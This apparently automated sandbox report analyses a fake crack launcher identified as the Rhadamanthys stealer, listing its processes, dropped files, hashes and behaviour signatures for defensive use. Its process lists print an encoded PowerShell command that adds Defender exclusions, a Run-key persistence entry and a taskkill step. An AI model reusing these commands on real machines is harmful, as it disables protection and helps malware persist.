Malware Analysis Report

2024-11-15 05:58

Sample ID 240405-ag4sgafb77
Target ICracklauncher.zip
SHA256 b67042a291ac385fe187641834a55613a4533ed69863ec8d5d50d59274e8609b
Tags
rhadamanthys pyinstaller stealer upx persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b67042a291ac385fe187641834a55613a4533ed69863ec8d5d50d59274e8609b

Threat Level: Known bad

The file ICracklauncher.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys pyinstaller stealer upx persistence

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

UPX packed file

Adds Run key to start application

Enumerates physical storage devices

Detects Pyinstaller

Unsigned PE

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-05 00:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win7-20240221-en

Max time kernel

117s

Max time network

122s

Command Line

C:\Windows\Explorer.EXE

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1404 created 1336 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\Explorer.EXE

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\explorer.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 2528 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 2528 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 2528 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\iCrack.exe

"C:\Users\Admin\AppData\Local\Temp\iCrack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

Network

N/A

Files

\Users\Admin\AppData\Roaming\svchost.exe

MD5 2ef91bf37b3da8cad6751b665bd4e6af
SHA1 5c15bbc721f91855388861d378cf9d26a140cead
SHA256 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3

memory/1248-12-0x00000000023F0000-0x000000000245D000-memory.dmp

memory/1248-9-0x00000000023F0000-0x000000000245D000-memory.dmp

memory/1404-13-0x0000000000210000-0x000000000027D000-memory.dmp

\Users\Admin\AppData\Local\explorer.exe

MD5 ce453607540a4b0e0c88476042d31791
SHA1 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512 f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

C:\Users\Admin\AppData\Local\Temp\_MEI25282\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

memory/2600-35-0x000007FEF6560000-0x000007FEF69C6000-memory.dmp

memory/1404-38-0x0000000002E10000-0x0000000003210000-memory.dmp

memory/1404-40-0x0000000002E10000-0x0000000003210000-memory.dmp

memory/1404-41-0x0000000077A10000-0x0000000077BB9000-memory.dmp

memory/1404-42-0x0000000002E10000-0x0000000003210000-memory.dmp

memory/1404-44-0x00000000776E0000-0x0000000077727000-memory.dmp

memory/2496-45-0x0000000000080000-0x0000000000089000-memory.dmp

memory/1404-46-0x0000000000210000-0x000000000027D000-memory.dmp

memory/2332-48-0x00000000746D0000-0x0000000074C7B000-memory.dmp

memory/2332-49-0x00000000746D0000-0x0000000074C7B000-memory.dmp

memory/2332-50-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2496-52-0x00000000006B0000-0x0000000000AB0000-memory.dmp

memory/2496-53-0x00000000006B0000-0x0000000000AB0000-memory.dmp

memory/2496-55-0x0000000077A10000-0x0000000077BB9000-memory.dmp

memory/2496-57-0x00000000776E0000-0x0000000077727000-memory.dmp

memory/2332-58-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2496-59-0x0000000077A10000-0x0000000077BB9000-memory.dmp

memory/2332-60-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2496-61-0x00000000006B0000-0x0000000000AB0000-memory.dmp

memory/2332-62-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win7-20240221-en

Max time kernel

119s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

148s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4024 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 99.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 241.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

139s

Max time network

159s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 145.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

92s

Max time network

96s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240319-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 868 created 2888 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\svchost.exe

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iCrack.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" C:\Users\Admin\explorer.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5096 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5096 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5096 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5096 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 5096 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1384 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1384 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 4652 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Windows\system32\cmd.exe
PID 4920 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4920 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4920 wrote to memory of 344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\explorer.exe
PID 4920 wrote to memory of 344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\explorer.exe
PID 344 wrote to memory of 2788 N/A C:\Users\Admin\explorer.exe C:\Users\Admin\explorer.exe
PID 344 wrote to memory of 2788 N/A C:\Users\Admin\explorer.exe C:\Users\Admin\explorer.exe
PID 2788 wrote to memory of 2744 N/A C:\Users\Admin\explorer.exe C:\Windows\system32\cmd.exe
PID 2788 wrote to memory of 2744 N/A C:\Users\Admin\explorer.exe C:\Windows\system32\cmd.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Users\Admin\AppData\Local\Temp\iCrack.exe

"C:\Users\Admin\AppData\Local\Temp\iCrack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat

C:\Windows\system32\taskkill.exe

taskkill /f /im "explorer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3764 --field-trial-handle=2228,i,17475224967547320003,13667387715861799238,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.34.115.104.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
NL 142.251.39.106:443 tcp
US 8.8.8.8:53 145.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 2ef91bf37b3da8cad6751b665bd4e6af
SHA1 5c15bbc721f91855388861d378cf9d26a140cead
SHA256 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3

memory/868-11-0x0000000000610000-0x000000000067D000-memory.dmp

C:\Users\Admin\AppData\Local\explorer.exe

MD5 ce453607540a4b0e0c88476042d31791
SHA1 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512 f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

C:\Users\Admin\AppData\Local\Temp\_MEI13842\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

C:\Users\Admin\AppData\Local\Temp\_MEI13842\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

memory/3340-38-0x0000000002CD0000-0x0000000002D06000-memory.dmp

memory/3340-40-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/3340-39-0x0000000073B20000-0x00000000742D0000-memory.dmp

memory/4652-42-0x00007FFFA84D0000-0x00007FFFA8936000-memory.dmp

memory/3340-41-0x00000000055F0000-0x0000000005C18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_ctypes.pyd

MD5 48ce90022e97f72114a95630ba43b8fb
SHA1 f2eba0434ec204d8c6ca4f01af33ef34f09b52fd
SHA256 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635
SHA512 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

memory/4652-56-0x00007FFFBAE90000-0x00007FFFBAEB4000-memory.dmp

memory/4652-57-0x00007FFFC06F0000-0x00007FFFC06FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_lzma.pyd

MD5 7c66f33a67fbb4d99041f085ef3c6428
SHA1 e1384891df177b45b889459c503985b113e754a3
SHA256 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866
SHA512 d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_bz2.pyd

MD5 f6e387f20808828796e876682a328e98
SHA1 6679ae43b0634ac706218996bac961bef4138a02
SHA256 8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b
SHA512 ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e

C:\Users\Admin\activate.bat

MD5 fbcbd43fa00e29f002495e4ab2dc4782
SHA1 75aad7a3fa21226bf37ff89da953743d2b650dc0
SHA256 7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648
SHA512 4f26971331fbe1d40e65d493f9417ebcca5e331b61285da2575629b7cd57bdb35ec480cf3ef9a1df48c949360ba9038797575a6181d79b52e1092e4f98bebb3e

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_socket.pyd

MD5 0dd957099cf15d172d0a343886fb7c66
SHA1 950f7f15c6accffac699c5db6ce475365821b92a
SHA256 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a
SHA512 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee

memory/3340-66-0x0000000005310000-0x0000000005332000-memory.dmp

memory/4652-67-0x00007FFFBADA0000-0x00007FFFBADB8000-memory.dmp

memory/4652-68-0x00007FFFBA620000-0x00007FFFBA64C000-memory.dmp

memory/3340-70-0x0000000005C90000-0x0000000005CF6000-memory.dmp

memory/3340-69-0x0000000005C20000-0x0000000005C86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xkbrb2dq.xa4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_hashlib.pyd

MD5 13f99120a244ab62af1684fbbc5d5a7e
SHA1 5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724
SHA256 11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b
SHA512 46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d

memory/3340-80-0x0000000005D00000-0x0000000006054000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_decimal.pyd

MD5 2030438e4f397a7d4241a701a3ca2419
